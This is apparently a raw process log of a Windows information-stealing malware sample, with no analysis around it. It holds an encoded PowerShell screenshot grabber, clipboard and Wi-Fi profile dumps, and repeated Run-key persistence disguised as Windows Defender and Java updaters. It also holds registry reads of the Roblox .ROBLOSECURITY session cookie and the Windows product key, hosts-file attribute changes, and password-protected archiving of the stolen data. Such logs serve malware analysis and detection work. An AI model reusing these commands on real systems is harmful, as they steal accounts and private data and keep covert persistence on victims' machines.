C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eboqnksw\eboqnksw.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\eboqnksw\CSCE2E16EF5A474B27AF78F85EA9185DA6.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5191.tmp\5192.tmp\5193.bat C:\Windows\system32\java.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5700.tmp\5701.tmp\5702.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\wCztR.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\wCztR.zip" *
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5F6C.tmp\5F6D.tmp\5F6E.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\66BF.tmp\66C0.tmp\66C1.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E70.tmp\6E71.tmp\6E72.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\76BD.tmp\76BE.tmp\76BF.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DE1.tmp\7DE2.tmp\7DE3.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
